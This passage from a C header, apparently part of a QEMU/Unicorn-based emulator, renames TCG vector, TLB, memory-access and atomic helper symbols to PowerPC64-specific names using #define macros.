tcg_gen_gvec_sub_ppc64 #define tcg_gen_gvec_mul tcg_gen_gvec_mul_ppc64 #define tcg_gen_gvec_muls tcg_gen_gvec_muls_ppc64 #define tcg_gen_gvec_muli tcg_gen_gvec_muli_ppc64 #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_ppc64 #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_ppc64 #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_ppc64 #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_ppc64 #define tcg_gen_gvec_smin tcg_gen_gvec_smin_ppc64 #define tcg_gen_gvec_umin tcg_gen_gvec_umin_ppc64 #define tcg_gen_gvec_smax tcg_gen_gvec_smax_ppc64 #define tcg_gen_gvec_umax tcg_gen_gvec_umax_ppc64 #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_ppc64 #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_ppc64 #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_ppc64 #define tcg_gen_gvec_neg tcg_gen_gvec_neg_ppc64 #define tcg_gen_gvec_abs tcg_gen_gvec_abs_ppc64 #define tcg_gen_gvec_and tcg_gen_gvec_and_ppc64 #define tcg_gen_gvec_or tcg_gen_gvec_or_ppc64 #define tcg_gen_gvec_xor tcg_gen_gvec_xor_ppc64 #define tcg_gen_gvec_andc tcg_gen_gvec_andc_ppc64 #define tcg_gen_gvec_orc tcg_gen_gvec_orc_ppc64 #define tcg_gen_gvec_nand tcg_gen_gvec_nand_ppc64 #define tcg_gen_gvec_nor tcg_gen_gvec_nor_ppc64 #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_ppc64 #define tcg_gen_gvec_ands tcg_gen_gvec_ands_ppc64 #define tcg_gen_gvec_andi tcg_gen_gvec_andi_ppc64 #define tcg_gen_gvec_xors tcg_gen_gvec_xors_ppc64 #define tcg_gen_gvec_xori tcg_gen_gvec_xori_ppc64 #define tcg_gen_gvec_ors tcg_gen_gvec_ors_ppc64 #define tcg_gen_gvec_ori tcg_gen_gvec_ori_ppc64 #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_ppc64 #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_ppc64 #define tcg_gen_gvec_shli tcg_gen_gvec_shli_ppc64 #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_ppc64 #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_ppc64 #define tcg_gen_gvec_shri tcg_gen_gvec_shri_ppc64 #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_ppc64 #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_ppc64 #define tcg_gen_gvec_sari tcg_gen_gvec_sari_ppc64 #define tcg_gen_gvec_shls tcg_gen_gvec_shls_ppc64 #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_ppc64 #define tcg_gen_gvec_sars tcg_gen_gvec_sars_ppc64 #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_ppc64 #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_ppc64 #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_ppc64 #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_ppc64 #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_ppc64 #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_ppc64 #define vec_gen_2 vec_gen_2_ppc64 #define vec_gen_3 vec_gen_3_ppc64 #define vec_gen_4 vec_gen_4_ppc64 #define tcg_gen_mov_vec tcg_gen_mov_vec_ppc64 #define tcg_const_zeros_vec tcg_const_zeros_vec_ppc64 #define tcg_const_ones_vec tcg_const_ones_vec_ppc64 #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_ppc64 #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_ppc64 #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_ppc64 #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_ppc64 #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_ppc64 #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_ppc64 #define tcg_gen_dupi_vec tcg_gen_dupi_vec_ppc64 #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_ppc64 #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_ppc64 #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_ppc64 #define tcg_gen_ld_vec tcg_gen_ld_vec_ppc64 #define tcg_gen_st_vec tcg_gen_st_vec_ppc64 #define tcg_gen_stl_vec tcg_gen_stl_vec_ppc64 #define tcg_gen_and_vec tcg_gen_and_vec_ppc64 #define tcg_gen_or_vec tcg_gen_or_vec_ppc64 #define tcg_gen_xor_vec tcg_gen_xor_vec_ppc64 #define tcg_gen_andc_vec tcg_gen_andc_vec_ppc64 #define tcg_gen_orc_vec tcg_gen_orc_vec_ppc64 #define tcg_gen_nand_vec tcg_gen_nand_vec_ppc64 #define tcg_gen_nor_vec tcg_gen_nor_vec_ppc64 #define tcg_gen_eqv_vec tcg_gen_eqv_vec_ppc64 #define tcg_gen_not_vec tcg_gen_not_vec_ppc64 #define tcg_gen_neg_vec tcg_gen_neg_vec_ppc64 #define tcg_gen_abs_vec tcg_gen_abs_vec_ppc64 #define tcg_gen_shli_vec tcg_gen_shli_vec_ppc64 #define tcg_gen_shri_vec tcg_gen_shri_vec_ppc64 #define tcg_gen_sari_vec tcg_gen_sari_vec_ppc64 #define tcg_gen_cmp_vec tcg_gen_cmp_vec_ppc64 #define tcg_gen_add_vec tcg_gen_add_vec_ppc64 #define tcg_gen_sub_vec tcg_gen_sub_vec_ppc64 #define tcg_gen_mul_vec tcg_gen_mul_vec_ppc64 #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_ppc64 #define tcg_gen_usadd_vec tcg_gen_usadd_vec_ppc64 #define tcg_gen_sssub_vec tcg_gen_sssub_vec_ppc64 #define tcg_gen_ussub_vec tcg_gen_ussub_vec_ppc64 #define tcg_gen_smin_vec tcg_gen_smin_vec_ppc64 #define tcg_gen_umin_vec tcg_gen_umin_vec_ppc64 #define tcg_gen_smax_vec tcg_gen_smax_vec_ppc64 #define tcg_gen_umax_vec tcg_gen_umax_vec_ppc64 #define tcg_gen_shlv_vec tcg_gen_shlv_vec_ppc64 #define tcg_gen_shrv_vec tcg_gen_shrv_vec_ppc64 #define tcg_gen_sarv_vec tcg_gen_sarv_vec_ppc64 #define tcg_gen_shls_vec tcg_gen_shls_vec_ppc64 #define tcg_gen_shrs_vec tcg_gen_shrs_vec_ppc64 #define tcg_gen_sars_vec tcg_gen_sars_vec_ppc64 #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_ppc64 #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_ppc64 #define tb_htable_lookup tb_htable_lookup_ppc64 #define tb_set_jmp_target tb_set_jmp_target_ppc64 #define cpu_exec cpu_exec_ppc64 #define cpu_loop_exit_noexc cpu_loop_exit_noexc_ppc64 #define cpu_reloading_memory_map cpu_reloading_memory_map_ppc64 #define cpu_loop_exit cpu_loop_exit_ppc64 #define cpu_loop_exit_restore cpu_loop_exit_restore_ppc64 #define cpu_loop_exit_atomic cpu_loop_exit_atomic_ppc64 #define tlb_init tlb_init_ppc64 #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_ppc64 #define tlb_flush tlb_flush_ppc64 #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_ppc64 #define tlb_flush_all_cpus tlb_flush_all_cpus_ppc64 #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_ppc64 #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_ppc64 #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_ppc64 #define tlb_flush_page tlb_flush_page_ppc64 #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_ppc64 #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_ppc64 #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_ppc64 #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_ppc64 #define tlb_protect_code tlb_protect_code_ppc64 #define tlb_unprotect_code tlb_unprotect_code_ppc64 #define tlb_reset_dirty tlb_reset_dirty_ppc64 #define tlb_set_dirty tlb_set_dirty_ppc64 #define tlb_set_page_with_attrs tlb_set_page_with_attrs_ppc64 #define tlb_set_page tlb_set_page_ppc64 #define get_page_addr_code_hostp get_page_addr_code_hostp_ppc64 #define get_page_addr_code get_page_addr_code_ppc64 #define probe_access probe_access_ppc64 #define tlb_vaddr_to_host tlb_vaddr_to_host_ppc64 #define helper_ret_ldub_mmu helper_ret_ldub_mmu_ppc64 #define helper_le_lduw_mmu helper_le_lduw_mmu_ppc64 #define helper_be_lduw_mmu helper_be_lduw_mmu_ppc64 #define helper_le_ldul_mmu helper_le_ldul_mmu_ppc64 #define helper_be_ldul_mmu helper_be_ldul_mmu_ppc64 #define helper_le_ldq_mmu helper_le_ldq_mmu_ppc64 #define helper_be_ldq_mmu helper_be_ldq_mmu_ppc64 #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_ppc64 #define helper_le_ldsw_mmu helper_le_ldsw_mmu_ppc64 #define helper_be_ldsw_mmu helper_be_ldsw_mmu_ppc64 #define helper_le_ldsl_mmu helper_le_ldsl_mmu_ppc64 #define helper_be_ldsl_mmu helper_be_ldsl_mmu_ppc64 #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_ppc64 #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_ppc64 #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_ppc64 #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_ppc64 #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_ppc64 #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_ppc64 #define cpu_ldub_data_ra cpu_ldub_data_ra_ppc64 #define cpu_ldsb_data_ra cpu_ldsb_data_ra_ppc64 #define cpu_lduw_data_ra cpu_lduw_data_ra_ppc64 #define cpu_ldsw_data_ra cpu_ldsw_data_ra_ppc64 #define cpu_ldl_data_ra cpu_ldl_data_ra_ppc64 #define cpu_ldq_data_ra cpu_ldq_data_ra_ppc64 #define cpu_ldub_data cpu_ldub_data_ppc64 #define cpu_ldsb_data cpu_ldsb_data_ppc64 #define cpu_lduw_data cpu_lduw_data_ppc64 #define cpu_ldsw_data cpu_ldsw_data_ppc64 #define cpu_ldl_data cpu_ldl_data_ppc64 #define cpu_ldq_data cpu_ldq_data_ppc64 #define helper_ret_stb_mmu helper_ret_stb_mmu_ppc64 #define helper_le_stw_mmu helper_le_stw_mmu_ppc64 #define helper_be_stw_mmu helper_be_stw_mmu_ppc64 #define helper_le_stl_mmu helper_le_stl_mmu_ppc64 #define helper_be_stl_mmu helper_be_stl_mmu_ppc64 #define helper_le_stq_mmu helper_le_stq_mmu_ppc64 #define helper_be_stq_mmu helper_be_stq_mmu_ppc64 #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_ppc64 #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_ppc64 #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_ppc64 #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_ppc64 #define cpu_stb_data_ra cpu_stb_data_ra_ppc64 #define cpu_stw_data_ra cpu_stw_data_ra_ppc64 #define cpu_stl_data_ra cpu_stl_data_ra_ppc64 #define cpu_stq_data_ra cpu_stq_data_ra_ppc64 #define cpu_stb_data cpu_stb_data_ppc64 #define cpu_stw_data cpu_stw_data_ppc64 #define cpu_stl_data cpu_stl_data_ppc64 #define cpu_stq_data cpu_stq_data_ppc64 #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_ppc64 #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_ppc64 #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_ppc64 #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_ppc64 #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_ppc64 #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_ppc64 #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_ppc64 #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_ppc64 #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_ppc64 #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_ppc64 #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_ppc64 #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_ppc64 #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_ppc64 #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_ppc64 #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_ppc64 #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_ppc64 #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_ppc64 #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_ppc64 #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_ppc64 #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_ppc64 #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_ppc64 #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_ppc64 #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_ppc64 #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_ppc64 #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_ppc64 #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_ppc64 #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_ppc64 #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_ppc64 #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_ppc64 #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_ppc64 #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_ppc64 #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_ppc64 #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_ppc64 #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_ppc64 #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_ppc64 #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_ppc64 #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_ppc64 #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_ppc64 #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_ppc64 #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_ppc64 #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_ppc64 #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_ppc64 #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_ppc64 #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_ppc64 #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_ppc64 #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_ppc64 #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_ppc64 #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_ppc64 #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_ppc64 #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_ppc64 #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_ppc64 #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_ppc64 #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_ppc64 #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_ppc64 #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_ppc64 #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_ppc64 #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_ppc64 #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_ppc64 #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_ppc64 #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_ppc64 #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_ppc64 #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_ppc64 #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_ppc64 #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_ppc64 #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_ppc64 #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_ppc64 #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_ppc64 #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_ppc64 #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_ppc64 #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_ppc64 #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_ppc64 #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_ppc64 #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_ppc64 #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_ppc64 #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_ppc64 #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_ppc64 #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_ppc64 #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_ppc64 #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_ppc64 #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_ppc64 #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_ppc64 #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_ppc64 #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_ppc64 #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_ppc64 #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_ppc64 #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_ppc64 #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_ppc64 #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_ppc64 #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_ppc64 #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_ppc64 #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_ppc64 #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_ppc64 #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_ppc64 #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_ppc64 #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_ppc64 #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_ppc64 #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_ppc64 #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_ppc64 #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_ppc64 #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_ppc64 #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_ppc64 #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_ppc64 #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_ppc64 #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_ppc64 #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_ppc64 #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_ppc64 #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_ppc64 #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_ppc64 #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_ppc64 #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_ppc64 #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_ppc64 #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_ppc64 #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_ppc64 #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_ppc64 #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_ppc64 #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_ppc64 #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_ppc64 #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_ppc64 #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_ppc64 #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_ppc64 #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_ppc64 #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_ppc64 #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_ppc64 #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_ppc64 #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_ppc64 #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_ppc64 #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_ppc64 #define helper_atomic_xchgb helper_atomic_xchgb_ppc64 #define helper_atomic_fetch_addb helper_atomic_fetch_addb_ppc64 #define helper_atomic_fetch_andb helper_atomic_fetch_andb_ppc64 #define helper_atomic_fetch_orb helper_atomic_fetch_orb_ppc64 #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_ppc64 #define helper_atomic_add_fetchb helper_atomic_add_fetchb_ppc64 #define helper_atomic_and_fetchb helper_atomic_and_fetchb_ppc64 #define helper_atomic_or_fetchb helper_atomic_or_fetchb_ppc64 #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_ppc64 #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_ppc64 #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_ppc64 #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_ppc64 #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_ppc64 #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_ppc64 #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_ppc64 #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_ppc64 #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_ppc64 #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_ppc64 #define helper_atomic_xchgw_le helper_atomic_xchgw_le_ppc64 #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_ppc64 #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_ppc64 #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_ppc64 #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_ppc64 #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_ppc64 #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_ppc64 #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_ppc64 #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_ppc64 #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_ppc64 #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_ppc64 #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_ppc64 #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_ppc64 #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_ppc64 #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_ppc64 #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_ppc64 #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_ppc64 #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_ppc64 #define helper_atomic_xchgw_be helper_atomic_xchgw_be_ppc64 #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_ppc64 #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_ppc64 #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_ppc64 #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_ppc64 #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_ppc64 #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_ppc64 #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_ppc64 #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_ppc64 #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_ppc64 #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_ppc64 #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_ppc64 #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_ppc64 #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_ppc64 #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_ppc64 #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_ppc64 #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_ppc64 #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_ppc64 #define helper_atomic_xchgl_le helper_atomic_xchgl_le_ppc64 #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_ppc64 #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_ppc64 #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_ppc64 #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_ppc64 #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_ppc64 #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_ppc64 #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_ppc64 #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_ppc64 #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_ppc64 #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_ppc64 #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_ppc64 #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_ppc64 #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_ppc64 #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_ppc64 #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_ppc64 #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_ppc64 #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_ppc64 #define helper_atomic_xchgl_be helper_atomic_xchgl_be_ppc64 #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_ppc64 #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_ppc64 #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_ppc64 #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_ppc64 #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_ppc64 #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_ppc64 #define 